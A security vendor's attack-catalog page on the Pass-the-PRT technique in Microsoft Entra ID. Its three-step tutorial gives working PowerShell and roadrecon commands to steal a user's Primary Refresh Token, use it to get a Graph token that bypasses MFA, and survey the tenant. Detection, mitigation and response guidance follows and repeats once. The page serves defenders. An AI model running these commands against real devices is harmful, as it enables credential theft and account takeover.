1. Home
  2. Resources
  3. Attack Catalog
  4. Pass the Primary Refresh Token (PRT) Attack

Pass the Primary Refresh Token (PRT) Attack

Entra ID
-pass-pol

Primary Refresh Tokens (PRTs) are crucial components in modern authentication, particularly in Microsoft Entra ID environments. A PRT is issued when a user logs into a Windows 10 or newer device that is registered to their Entra ID tenant. Once issued, the PRT is securely stored on the device it was issued to and can be used to seamlessly authenticate to cloud resources for a lengthy period (14-90 days depending on usage).

Adversaries can use a technique called Pass-the-PRT to steal a Primary Refresh Token from a device and subsequently use it to authenticate as the victim to cloud resources. This method of authentication effectively bypasses Multi-Factor Authentication and circumvents security controls allowing the adversary access to the requested resources.

Threat Summary
Target:
Entra ID (formerly Azure AD)
Tools:
ROADTools Mimikatz, AADInternals
ATT&CK® Tactic:
Credential Access
ATT&CK Technique:
T1003
Difficulty
Detection:
Medium
Mitigation:
Hard
Response:
Hard

Attack Tutorial: How a Pass the Primary Refresh Token (PRT) Attack Works



STEP 1

Extracts the Users Primary Refresh Token

The adversary requires code execution on the device as either an administrator or a user to attempt PRT extraction. In this case, the adversary is not an administrator so uses the AADInternals PowerShell module to simplify getting the PRT of the victim.

The AADInternals Get-AADIntUserPRTToken defaults to using the BrowserCore executable to extract the PRT from the x-ms-RefreshTokenCredential cookie. However, there are options other than BrowserCore.exe such as interfacing directly with the underlying COM objects that are in the MicrosoftAccountTokenProvider.dll as well as the mimikatz sekurlsa module that can extract the PRT when it has been loaded into LSASS.

Code

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Confirm:$False

Install-Module AADInternals -Scope CurrentUser -Force -Confirm:$False

Import-Module AADInternals

$PRT = Get-AADIntUserPRTToken

$PRT



Output

    ___    ___    ____  ____      __                        __

   /   |  /   |  / __ \/  _/___  / /____  _________  ____ _/ /____

  / /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ `/ / ___/

 / ___ |/ ___ |/ /_/ _/ // / / / /_/  __/ /  / / / / /_/ / (__  )

/_/  |_/_/  |_/_____/___/_/ /_/\__/\___/_/  /_/ /_/\__,_/_/____/




 v0.9.4 by @DrAzureAD (Nestori Syynimaa)




eyJhbGciOiJIUzI1NiIsICJrZGZfdmVyIjoyLCAiY3R4IjoiXC9IdmJKUVNhZFF<output_truncated>uZG93cyIsICJyZXF1ZXN0X25 vbmNlIjoiQXdBQkVnRUFBQUFEQU96X0JRRDBfNUVpNU8tY20yRzdiNEVyZ242SzU3Y2xDQThLYXBiLUU1M3hJZ0FpYkFu M09EbHRiMHAtYjZFTUpZbGJ6MDBXUU8tZVloLWp3MVNFekpieWp3ZHJNbDhnQUEifQ.ykZ4Zc0trLmvDGtSCYv3_SPhRH jGfB_IVYHo0zvLBSQ
STEP 2

Authenticates using the PRT

The adversary can now use the primary refresh token to authenticate as the victim user to get access to the different resources. Due to the using of the PRT this bypasses certain security mechanisms such as MFA.

In this case the adversary uses the PRT to request a token for the Graph API.

Code

$JWT = Get-AADIntAccessTokenForAADGraph -PRTToken $PRT -SaveToCache

$JWT

# Testing access works

Get-AADIntUsers | Select-Object UserPrincipalName -First 1

Output

AccessToken saved to cache




Tenant                               User                      Resource                  Client

------                               ----                      --------                  ------

ea2105c0-712b-48d2-93e2-3cd52d0ba327 CUser1@stealthbitslab.com https://graph.windows.net 1b730954-1685-4b74-9bfd-dac...




UserPrincipalName

-----------------

Deborah@stealthbitslab.com
STEP 3

Further objectives

Now the adversary is authenticated as the victim's account they are going to perform reconaissance on the victims Entra ID Tenant.

In this case reconnaissance will be performed using roadrecon to automate the collection and analysis of data to help users

Code

# To get the JWT from the cache you can use the Get-AADIntAccessTokenFromCache command.

roadrecon auth --access-token "<Enter JWT>"

readrecon gather

Output

Tokens were written to .roadtools_auth




Starting data gathering phase 1 of 2 (collecting objects)

Starting data gathering phase 2 of 2 (collecting properties and relationships)

ROADrecon gather executed in 13.22 seconds and issued 2382 HTTP requests.

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Medium

Detection of Pass-the-PRT is a challenge due to the number of different ways the attack can be conducted all having their own markers.

Capturing the extraction of PRT related information across endpoints is a critical first step and will usually be completed with an EDR solution. Here are some specific items that relate to PRT extraction:

  • Process creation for BrowserCore.exe where the creator process is non-standard, such as PowerShell.
  • Any and all access into LSASS.exe should be monitored
    • Windows Defender Attack Surface Reduction rules can specifically detect credential stealing from LSASS.
  • Exporting the device certificate and device transport key from a device
  • Monitor for known tools and specific command line options such as:
    • Get-AADIntUserPRTToken
    • Mimikatz.exe
    • sekurlsa::cloudap

Further detection options include using the the cloud signin and audit logs to perform User Beavhior Analytics (UEBA) to catch things such as authentication from unfamiliar locations, unusual sign-in properties and suspicious behavior in the tenant.

Difficulty: Hard

Organizations looking to mitigate Pass-the-PRT should focus on:

  • Reducing the number of users with administrator access to their devices
  • Using built-in security features such as:
    • Attack Surface Reduction rules to block credential stealing from LSASS
    • Tamper protection to ensure security settings are kept as configured.
  • Ensuring endpoints that are cloud-connected have basic security measures such as:
    • An EDR/AV solution installed and configured
    • Tamper protection measures enabled
    • Updates applied in a timely manner
Difficulty: Hard

When Pass-the-PRT is detected defenders need to take a two-pronged approach in response, initially containing the compromised account. Secondly a manual investigation will be required to understand what activities the account performed whilst compromised and see if further remediation action needs to happen.

Here are some automated response steps that can be taken:

  • Activate the incident response process and alert the response team
  • Isolate the endpoint that suspicious activity was detected on
  • Revoke the compromised users signin sessions
  • Mark the account as "confirmed compromised" in Entra ID
Detect
Difficulty: Medium

Detection of Pass-the-PRT is a challenge due to the number of different ways the attack can be conducted all having their own markers.

Capturing the extraction of PRT related information across endpoints is a critical first step and will usually be completed with an EDR solution. Here are some specific items that relate to PRT extraction:

  • Process creation for BrowserCore.exe where the creator process is non-standard, such as PowerShell.
  • Any and all access into LSASS.exe should be monitored
    • Windows Defender Attack Surface Reduction rules can specifically detect credential stealing from LSASS.
  • Exporting the device certificate and device transport key from a device
  • Monitor for known tools and specific command line options such as:
    • Get-AADIntUserPRTToken
    • Mimikatz.exe
    • sekurlsa::cloudap

Further detection options include using the the cloud signin and audit logs to perform User Beavhior Analytics (UEBA) to catch things such as authentication from unfamiliar locations, unusual sign-in properties and suspicious behavior in the tenant.

Mitigate
Difficulty: Hard

Organizations looking to mitigate Pass-the-PRT should focus on:

  • Reducing the number of users with administrator access to their devices
  • Using built-in security features such as:
    • Attack Surface Reduction rules to block credential stealing from LSASS
    • Tamper protection to ensure security settings are kept as configured.
  • Ensuring endpoints that are cloud-connected have basic security measures such as:
    • An EDR/AV solution installed and configured
    • Tamper protection measures enabled
    • Updates applied in a timely manner
Respond
Difficulty: Hard

When Pass-the-PRT is detected defenders need to take a two-pronged approach in response, initially containing the compromised account. Secondly a manual investigation will be required to understand what activities the account performed whilst compromised and see if further remediation action needs to happen.

Here are some automated response steps that can be taken:

  • Activate the incident response process and alert the response team
  • Isolate the endpoint that suspicious activity was detected on
  • Revoke the compromised users signin sessions
  • Mark the account as "confirmed compromised" in Entra ID
RELATED READING


In Practice

Fire Image Featured Solutions
Netwrix Threat Manager
Netwrix Enterprise Auditor
Netwrix Privilege Secure
OTHER ATTACKS
Pass the Ticket Attack
Pass the Hash Attack

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.